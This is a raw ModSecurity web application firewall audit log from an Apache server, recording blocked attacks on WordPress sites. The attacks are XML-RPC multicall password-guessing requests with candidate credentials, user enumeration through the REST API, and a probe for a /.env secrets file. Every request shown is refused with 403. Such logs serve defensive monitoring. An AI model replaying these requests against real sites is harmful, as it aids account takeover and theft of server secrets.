at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 91.134.248.249 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747915148262604 4606 (- - -) Stopwatch2: 1747915148262604 4606; combined=3560, p1=370, p2=3019, p3=0, p4=0, p5=100, sr=72, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd94eb19-Z-- --efdaff69-A-- [22/May/2025:18:59:19 +0700] aC8Rl30O04WKE1HJ5iR1NgAAABM 103.236.140.4 53990 103.236.140.4 8181 --efdaff69-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 142.4.0.114 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 142.4.0.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --efdaff69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --efdaff69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747915159982180 2132 (- - -) Stopwatch2: 1747915159982180 2132; combined=1076, p1=359, p2=686, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --efdaff69-Z-- --a5b8c36d-A-- [22/May/2025:19:08:45 +0700] aC8TzeThJmFSRJ5-OZfakAAAAEo 103.236.140.4 54378 103.236.140.4 8181 --a5b8c36d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 91.134.248.249 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 91.134.248.249 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a5b8c36d-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel75! --a5b8c36d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5b8c36d-E-- --a5b8c36d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 91.134.248.249 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747915725842391 7910 (- - -) Stopwatch2: 1747915725842391 7910; combined=5321, p1=736, p2=4384, p3=0, p4=0, p5=118, sr=136, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5b8c36d-Z-- --a1355d18-A-- [22/May/2025:19:13:03 +0700] aC8Uz30O04WKE1HJ5iR1TQAAAA8 103.236.140.4 54542 103.236.140.4 8181 --a1355d18-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.82.194.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.82.194.26 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a1355d18-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel061177 --a1355d18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1355d18-E-- --a1355d18-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.82.194.26 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747915983327586 6411 (- - -) Stopwatch2: 1747915983327586 6411; combined=4355, p1=552, p2=3618, p3=0, p4=0, p5=111, sr=91, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1355d18-Z-- --37e33f54-A-- [22/May/2025:19:13:48 +0700] aC8U_H0O04WKE1HJ5iR1UAAAABI 103.236.140.4 54570 103.236.140.4 8181 --37e33f54-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 77.156.227.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 77.156.227.220 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --37e33f54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37e33f54-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747916028624706 3494 (- - -) Stopwatch2: 1747916028624706 3494; combined=1447, p1=525, p2=890, p3=0, p4=0, p5=32, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37e33f54-Z-- --d1561662-A-- [22/May/2025:19:16:40 +0700] aC8VqCektx75wRFPQyj9YgAAANE 103.236.140.4 54674 103.236.140.4 8181 --d1561662-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.139.192.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.139.192.47 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d1561662-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1561662-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747916200491750 2172 (- - -) Stopwatch2: 1747916200491750 2172; combined=1055, p1=353, p2=676, p3=0, p4=0, p5=26, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1561662-Z-- --70df354d-A-- [22/May/2025:19:18:42 +0700] aC8WIn0O04WKE1HJ5iR1WwAAAAM 103.236.140.4 54752 103.236.140.4 8181 --70df354d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.82.194.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.82.194.26 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --70df354d-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel11! --70df354d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70df354d-E-- --70df354d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.82.194.26 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747916322872705 5801 (- - -) Stopwatch2: 1747916322872705 5801; combined=4468, p1=512, p2=3772, p3=0, p4=0, p5=108, sr=91, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70df354d-Z-- --d457f033-A-- [22/May/2025:19:29:53 +0700] aC8YwX0O04WKE1HJ5iR1fwAAAAQ 103.236.140.4 55262 103.236.140.4 8181 --d457f033-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 192.141.98.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.141.98.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d457f033-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d457f033-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747916993908645 2856 (- - -) Stopwatch2: 1747916993908645 2856; combined=1248, p1=418, p2=802, p3=0, p4=0, p5=28, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d457f033-Z-- --dd111a27-A-- [22/May/2025:19:33:12 +0700] aC8ZiH0O04WKE1HJ5iR1hQAAAAk 103.236.140.4 55388 103.236.140.4 8181 --dd111a27-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.250.42.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.250.42.56 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dd111a27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd111a27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747917192236033 2488 (- - -) Stopwatch2: 1747917192236033 2488; combined=1100, p1=369, p2=674, p3=0, p4=0, p5=57, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd111a27-Z-- --ccbe7149-A-- [22/May/2025:19:57:43 +0700] aC8fRyektx75wRFPQyj-FQAAAM0 103.236.140.4 55718 103.236.140.4 8181 --ccbe7149-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 155.133.138.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.133.138.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ccbe7149-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ccbe7149-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747918663642946 3156 (- - -) Stopwatch2: 1747918663642946 3156; combined=1354, p1=475, p2=846, p3=0, p4=0, p5=33, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ccbe7149-Z-- --fe5cc638-A-- [22/May/2025:20:12:31 +0700] aC8iv2friXjg62qQwE9mKgAAAIg 103.236.140.4 56254 103.236.140.4 8181 --fe5cc638-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 Accept-Charset: utf-8 --fe5cc638-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe5cc638-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747919551462881 740 (- - -) Stopwatch2: 1747919551462881 740; combined=298, p1=260, p2=0, p3=0, p4=0, p5=38, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe5cc638-Z-- --3f175b4b-A-- [22/May/2025:20:29:03 +0700] aC8mn-ThJmFSRJ5-OZfb8wAAAFI 103.236.140.4 57160 103.236.140.4 8181 --3f175b4b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1500 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --3f175b4b-C-- system.multicall methodName wp.getUsersBlogs params miswan miswan@2025 --3f175b4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f175b4b-E-- --3f175b4b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747920543811224 7624 (- - -) Stopwatch2: 1747920543811224 7624; combined=5781, p1=494, p2=5104, p3=0, p4=0, p5=112, sr=85, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f175b4b-Z-- --4905aa56-A-- [22/May/2025:20:30:06 +0700] aC8m3mfriXjg62qQwE9mfwAAAIQ 103.236.140.4 57326 103.236.140.4 8181 --4905aa56-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1492 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --4905aa56-C-- system.multicall methodName wp.getUsersBlogs params miswan 007 --4905aa56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4905aa56-E-- --4905aa56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (14+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747920606525983 6494 (- - -) Stopwatch2: 1747920606525983 6494; combined=5228, p1=478, p2=4581, p3=0, p4=0, p5=100, sr=103, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4905aa56-Z-- --f2abef58-A-- [22/May/2025:20:31:17 +0700] aC8nJeThJmFSRJ5-OZfcPAAAAFM 103.236.140.4 57448 103.236.140.4 8181 --f2abef58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1495 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --f2abef58-C-- system.multicall methodName wp.getUsersBlogs params miswan MISWAN --f2abef58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2abef58-E-- --f2abef58-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (6+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747920677509040 6843 (- - -) Stopwatch2: 1747920677509040 6843; combined=5222, p1=481, p2=4556, p3=0, p4=0, p5=108, sr=88, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2abef58-Z-- --10f8ed40-A-- [22/May/2025:20:32:23 +0700] aC8nZ-ThJmFSRJ5-OZfcZgAAAEU 103.236.140.4 57576 103.236.140.4 8181 --10f8ed40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1498 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --10f8ed40-C-- system.multicall methodName wp.getUsersBlogs params admin admin@2025 --10f8ed40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10f8ed40-E-- --10f8ed40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (9+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747920743495041 7121 (- - -) Stopwatch2: 1747920743495041 7121; combined=5680, p1=522, p2=4910, p3=0, p4=0, p5=150, sr=126, sw=98, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10f8ed40-Z-- --f55e4378-A-- [22/May/2025:20:33:30 +0700] aC8nquThJmFSRJ5-OZfchwAAAFQ 103.236.140.4 57682 103.236.140.4 8181 --f55e4378-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1492 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --f55e4378-C-- system.multicall methodName wp.getUsersBlogs params admin pass --f55e4378-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f55e4378-E-- --f55e4378-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (8+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747920810186376 7379 (- - -) Stopwatch2: 1747920810186376 7379; combined=5588, p1=480, p2=4946, p3=0, p4=0, p5=96, sr=102, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f55e4378-Z-- --422ed533-A-- [22/May/2025:20:34:30 +0700] aC8n5uThJmFSRJ5-OZfctQAAAEk 103.236.140.4 57830 103.236.140.4 8181 --422ed533-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1493 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --422ed533-C-- system.multicall methodName wp.getUsersBlogs params admin nimda --422ed533-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --422ed533-E-- --422ed533-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (11+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747920870949468 6241 (- - -) Stopwatch2: 1747920870949468 6241; combined=5163, p1=460, p2=4547, p3=0, p4=0, p5=93, sr=86, sw=63, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
